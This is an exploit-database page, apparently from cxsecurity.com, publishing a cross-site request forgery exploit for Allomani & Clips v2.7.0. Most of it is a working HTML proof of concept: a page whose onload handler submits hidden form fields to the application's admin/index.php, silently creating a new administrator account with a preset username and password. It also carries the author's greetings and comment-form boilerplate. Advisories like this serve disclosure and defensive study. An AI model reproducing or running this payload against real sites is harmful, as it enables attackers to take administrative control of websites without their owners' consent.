Allomani & Clips v2.7.0 - CSRF Add Admin Account

2010.06.26
Credit: G0D-F4Th3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Allomani & Clips v2.7.0 - [CSRF] Add Admin Account # Date:25 -06-2010 # Author: G0D-F4Th3r # Software Link: http://demos.allomani.com/songs270/ # Version: 2.7.0 # Tested on: http://demos.allomani.com/songs270/ #################################################### <html> <body onload="javascript:fireForms()"> <form method="POST" name="form0" action="http://www.site.com/[path]/admin/index.php"> <input type="hidden" name="action" value="adduserok"/> <input type="hidden" name="username" value="admin2"/> <input type="hidden" name="password" value="admin2123"/> <input type="hidden" name="email" value="test@test.com"/> <input type="hidden" name="group_id" value="1"/> <input type="hidden" name="useraddbutton" value="&#1575;&#1590;&#1575;&#1601;&#1577;"/> </form> </body> </html> ############ Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends ############


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top